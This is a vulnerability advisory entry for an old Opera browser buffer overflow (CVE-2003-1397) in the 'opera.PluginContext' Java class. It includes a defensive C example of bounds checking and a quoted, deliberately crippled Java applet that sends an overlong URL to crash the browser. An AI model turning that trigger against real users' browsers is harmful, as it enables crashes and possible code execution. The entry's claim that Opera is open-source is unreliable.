Opera opera.PluginContext Native Method Remote Buffer Overflow Vulnerability

Vulnerability ID: 1107155    Vulnerability type: Buffer overflow
Published: 2003-01-13    Updated: 2003-12-31
CVE number: CVE-2003-1397    CNNVD-ID: CNNVD-200312-360
Platform: Windows    CVSS score: 4.3
|Vulnerability sources
https://www.exploit-db.com/exploits/22240
https://cxsecurity.com/issue/WLB-2007100076
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-360
|Vulnerability details
Opera is an open-source web browser. A trusted Java class shipped with Opera ('opera.PluginContext') contains a buffer overflow vulnerability. A remote attacker can exploit it by constructing a malicious page and enticing a user to open it, causing a buffer overflow in Opera and possibly executing arbitrary instructions on the system with Opera's privileges. Opera keeps its own class files in the opera.jar library, and the system policy treats these files as trusted resources. However, a native method in the Java class ('opera.PluginContext') lacks proper checking of user input. When the showDocument method of a PluginContext object is called with a URL object that contains an overly long string, the 'native' method it invokes cannot handle this value correctly, and the Java virtual machine crashes; a carefully crafted string could possibly execute arbitrary instructions on the system with the privileges of the Opera process.
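The defect described above is a trusted native entry point that accepts a caller-controlled string without checking its length before handling it in a fixed-size buffer. The following C model, added here as an illustration and not Opera's code, shows the check that such an entry point needs: the length is measured against the buffer bound first, an overlong URL is refused with a status code, and the copy only happens once it is known to fit. The function names, the 2048-byte limit and the 30000-byte test input are constructed for this example (the latter mirrors the string length used in the published applet).

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical maximum URL length the native layer accepts. This is an
 * assumption for the example, not a value from the advisory. */
#define MAX_URL_LEN 2048

/* Status codes returned by the hypothetical native entry point. */
enum show_result { SHOW_OK = 0, SHOW_ERR_NULL = 1, SHOW_ERR_TOO_LONG = 2 };

/* Bounded string length: scans at most 'limit' bytes, so a huge or
 * unterminated input is never walked past what we are willing to accept. */
static size_t bounded_len(const char *s, size_t limit)
{
    size_t n = 0;
    while (n < limit && s[n] != '\0')
        n++;
    return n;
}

/* Hardened model of a native "showDocument" handler. 'out' is a fixed
 * buffer of 'out_size' bytes; the URL is copied into it only after the
 * length check proves it fits together with its terminating NUL. */
enum show_result show_document_checked(const char *url, char *out, size_t out_size)
{
    if (url == NULL || out == NULL || out_size == 0)
        return SHOW_ERR_NULL;

    size_t len = bounded_len(url, out_size);
    if (len >= out_size)            /* no room for the NUL: refuse it */
        return SHOW_ERR_TOO_LONG;

    memcpy(out, url, len + 1);      /* len < out_size, so the NUL fits */
    return SHOW_OK;
}

/* Constructed test input: 'n' bytes of 'a' plus a NUL. Caller frees. */
char *make_long_url(size_t n)
{
    char *s = malloc(n + 1);
    if (s == NULL)
        return NULL;
    memset(s, 'a', n);
    s[n] = '\0';
    return s;
}

int main(void)
{
    char buf[MAX_URL_LEN + 1];
    enum show_result r;

    r = show_document_checked("http://example.invalid/page", buf, sizeof buf);
    printf("normal URL: status %d%s%s\n", r, r == SHOW_OK ? " -> " : "",
           r == SHOW_OK ? buf : "");

    char *big = make_long_url(30000);
    r = show_document_checked(big, buf, sizeof buf);
    printf("30000-byte URL: status %d (2 = rejected as too long)\n", r);
    free(big);
    return 0;
}
```

The point of the model is the order of operations: the bound is enforced before any byte reaches the fixed buffer, and the caller receives an error rather than a crash. The same shape applies to a JNI handler, where the length of the incoming string would be checked before it is copied into native storage.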
|Vulnerability EXP
source: http://www.securityfocus.com/bid/6814/info

Opera ships with a trusted Java class ('opera.PluginContext') that includes a native method that is reportedly prone to denial of service attacks. It is possible for a malicious Java applet to trigger this condition to cause a denial of service. This issue was reported in versions of Opera for Microsoft Windows operating systems. It is not known if other platforms are also affected. Java support must be enabled for this issue to be present and can be disabled to prevent attacks.

//Marc Schoenefeld 1/13/2003, www.illegalaccess.org
//not runnable, a little crippled, there are a couple of obvious syntax errors to avoid script-kidding

...
import opera.PluginContext; // !! import the vulnerable class
...

public class OperaCall2 extends App1et
{

    public OperaCall2()
    {
    }

    public void paint(Graphics g)
    {
        PluginContext plugincontext = new PluginContext(l);
        try
        {
            plugincontext.showDocument(new URL("http://xxx.xxx" + new String(new byte[30000])));
        }
        catch(Exception exception)
        {
            exception.printStackTrace();
        }
    }
}
|References

Source: XF
Name: opera-plugincontextshowdocument-bo(11280)
Link: http://xforce.iss.net/xforce/xfdb/11280
Source: BID
Name: 6814
Link: http://www.securityfocus.com/bid/6814
Source: BUGTRAQ
Name: 20030210 Java-Applet crashes Opera 6.05 and 7.01
Link: http://www.securityfocus.com/archive/1/311214
Source: SREASON
Name: 3255
Link: http://securityreason.com/securityalert/3255
Source: NSFOCUS
Name: 4372
Link: http://www.nsfocus.net/vulndb/4372